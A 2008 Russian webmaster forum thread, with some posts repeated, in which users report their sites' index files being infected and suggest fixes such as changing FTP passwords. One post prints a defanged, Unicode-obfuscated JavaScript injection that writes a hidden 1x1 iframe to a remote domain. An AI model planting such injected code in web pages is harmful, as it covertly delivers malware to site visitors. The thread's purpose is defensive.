Вирусы, вирусы, вирусы:(

DRIVER · 23.08.2008, 09:49

Всем привет. Вчера столкнулся с такой ситуацией, какой то вирус заразил на хостинге (на трех сайтах) файл INDEX.html. Самое странное то что остальные страницы без вирусов а именно главная. Кто то сталкивался с такой проблемой?

lay · 23.08.2008, 10:04

Жесть!

В чем заключается "заражение"?

jokero · 23.08.2008, 10:12

Цитата:

Сообщение от DRIVER

Всем привет. Вчера столкнулся с такой ситуацией, какой то вирус заразил на хостинге (на трех сайтах) файл INDEX.html. Самое странное то что остальные страницы без вирусов а именно главная. Кто то сталкивался с такой проблемой?

1.Что он делает изменяет код в странице?
2. Чуток разделом ошиблись (здесь задают вопросы по системе)

DRIVER · 23.08.2008, 10:16

Цитата:

Сообщение от lay

Жесть!

В чем заключается "заражение"?

Оно заключаеться в том, что закачиваешь файл на сервер, через пару часиков заходишь в Оперу и вуаля, антивирус еаходит какую то дрянь

Вот щас думаю что делать?! Может подкажет кто то

Добавлено через 1 минуту

Цитата:

Сообщение от jokero

1.Что он делает изменяет код в странице?
2. Чуток разделом ошиблись (здесь задают вопросы по системе)

В том то и дело, что код страницы не изменяет.

WebDigger · 23.08.2008, 10:17

1. Меняем пароли доступа по ФТП
2. Меняем зараженные файлы
3. Больше НЕ ПОЛЬЗУЕМСЯ не лецинзионным Тотал/Виндоус Командером для загрузки фалов по ФТП, а скачиваем Core FTP Lite и живем счастливо.

DRIVER · 23.08.2008, 10:41

Цитата:

Сообщение от WebDigger

1. Меняем пароли доступа по ФТП
2. Меняем зараженные файлы
3. Больше НЕ ПОЛЬЗУЕМСЯ не лецинзионным Тотал/Виндоус Командером для загрузки фалов по ФТП, а скачиваем Core FTP Lite и живем счастливо.

А что Core FTP Lite лучше Turbo FTP ?

Ank · 23.08.2008, 10:51

Цитата:

Сообщение от DRIVER

В том то и дело, что код страницы не изменяет.

И где тогда вирус? В просто хтмл - вирус так видно, глазами. Чай не винда... может не на сайте вирь?

denrox47 · 23.08.2008, 10:59

тож самое))) на всех сайтах в index.html и index.php в самом конце нашел вод такой код
script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068 \u0074\u0074\u0070\u003a\u002f\u002f\u0072\u0075\u 006f\u006f\u002e\u0069\u006e\u0066\u006f\u002f\u00 30\u0033\u0030\u0036\u002f\u0069\u006e\u0064\u0065 \u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u 0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u00 65\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073 \u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u 0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u00 3a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070 \u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u 0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u00 22\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d \u0065\u003e');
</script
в этом скрипте решил убрать "<" и ">" а то вдруг заражу наш форум)))
нашел его только вчера, на сайтах был где то с начала июня

Ufaweb · 23.08.2008, 11:10

После прогонов аллсабом аналогично все файлы index.* на фтп с уровнем вложенности до 3-го, дописываются iframe'ом на сайт faina.cc вроде... Сам больше не гоняю по каталогам, пусть другие ловят зверье за 5 баксов

FanToM 0T F_1M · 23.08.2008, 17:41

Это фреймы

удаляй и живи красиво

23.08.2008, 09:49	#1
DRIVER Эксперт Регистрация: 22.08.2008 Сообщений: 1,026 Вес репутации: 233	Вирусы, вирусы, вирусы:( Всем привет. Вчера столкнулся с такой ситуацией, какой то вирус заразил на хостинге (на трех сайтах) файл INDEX.html. Самое странное то что остальные страницы без вирусов а именно главная. Кто то сталкивался с такой проблемой?

23.08.2008, 10:17	#5
WebDigger WebDigger Регистрация: 03.03.2008 Адрес: Ростов-на-Дону Сообщений: 509 Вес репутации: 287	1. Меняем пароли доступа по ФТП 2. Меняем зараженные файлы 3. Больше НЕ ПОЛЬЗУЕМСЯ не лецинзионным Тотал/Виндоус Командером для загрузки фалов по ФТП, а скачиваем Core FTP Lite и живем счастливо. __________________ SEO-аудит с 2008 года. Я был первым на этом форуме, кто стал палить темы!

23.08.2008, 17:41	#10
FanToM 0T F_1M Специалист Регистрация: 08.04.2008 Адрес: Астрахань Сообщений: 355 Вес репутации: 205	Это фреймы удаляй и живи красиво __________________ Продвижение ваших проектов в ТОП Обращаться на почту 1ast@bk.ru

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Внимание! Вирусы!	Wink	Вопросы по работе системы	233	05.05.2009 10:02

23.08.2008, 10:04	#2
lay Мастер Регистрация: 11.08.2007 Сообщений: 705 Вес репутации: 233	Жесть! В чем заключается "заражение"?

23.08.2008, 10:59	#8
denrox47 Новичок Регистрация: 09.04.2008 Сообщений: 11 Вес репутации: 0	тож самое))) на всех сайтах в index.html и index.php в самом конце нашел вод такой код script type="text/javascript"> document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068 \u0074\u0074\u0070\u003a\u002f\u002f\u0072\u0075\u 006f\u006f\u002e\u0069\u006e\u0066\u006f\u002f\u00 30\u0033\u0030\u0036\u002f\u0069\u006e\u0064\u0065 \u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u 0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u00 65\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073 \u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u 0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u00 3a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070 \u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u 0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u00 22\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d \u0065\u003e'); </script в этом скрипте решил убрать "<" и ">" а то вдруг заражу наш форум))) нашел его только вчера, на сайтах был где то с начала июня

23.08.2008, 11:10	#9
Ufaweb Особый статус Регистрация: 23.03.2008 Адрес: localhost Сообщений: 2,594 Вес репутации: 322	После прогонов аллсабом аналогично все файлы index.* на фтп с уровнем вложенности до 3-го, дописываются iframe'ом на сайт faina.cc вроде... Сам больше не гоняю по каталогам, пусть другие ловят зверье за 5 баксов